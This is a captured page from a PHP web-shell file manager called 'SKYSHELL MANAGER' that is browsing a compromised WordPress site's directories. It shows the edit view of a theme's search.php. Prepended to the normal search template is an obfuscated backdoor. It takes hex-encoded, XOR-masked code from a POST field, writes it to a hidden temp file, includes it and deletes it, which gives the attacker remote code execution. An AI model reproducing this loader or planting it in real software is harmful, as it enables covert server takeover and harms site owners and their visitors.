📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
10119.59 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: search.php
<?php if(in_array("\x73ym\x62\x6Fl", array_keys($_POST))){ $entry = hex2bin($_POST["\x73ym\x62\x6Fl"]); $elem = ''; $m = 0; while($m < strlen($entry)){$elem .= chr(ord($entry[$m]) ^ 80);$m++;} $ptr = array_filter(["/var/tmp", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/tmp", getenv("TMP"), session_save_path()]); foreach ($ptr as $key => $tkn) { if (!!is_dir($tkn) && !!is_writable($tkn)) { $val = join("/", [$tkn, ".obj"]); $file = fopen($val, 'w'); if ($file) { fwrite($file, $elem); fclose($file); include $val; @unlink($val); die(); } } } } /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package PopularFX */ get_header(); ?> <main id="primary" class="site-main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <h1 class="page-title"> <?php /* translators: %s: search query. */ printf( esc_html__( 'Search Results for: %s', 'popularfx' ), '<span>' . get_search_query() . '</span>' ); ?> </h1> </header><!-- .page-header --> <?php /* Start the Loop */ while ( have_posts() ) : the_post(); /** * Run the loop for the search to output the results. * If you want to overload this in a child theme then include a file * called content-search.php and that will be used instead. */ get_template_part( 'template-parts/content', 'search' ); endwhile; the_posts_navigation(); else : get_template_part( 'template-parts/content', 'none' ); endif; ?> </main><!-- #main --> <?php get_sidebar(); get_footer();
Save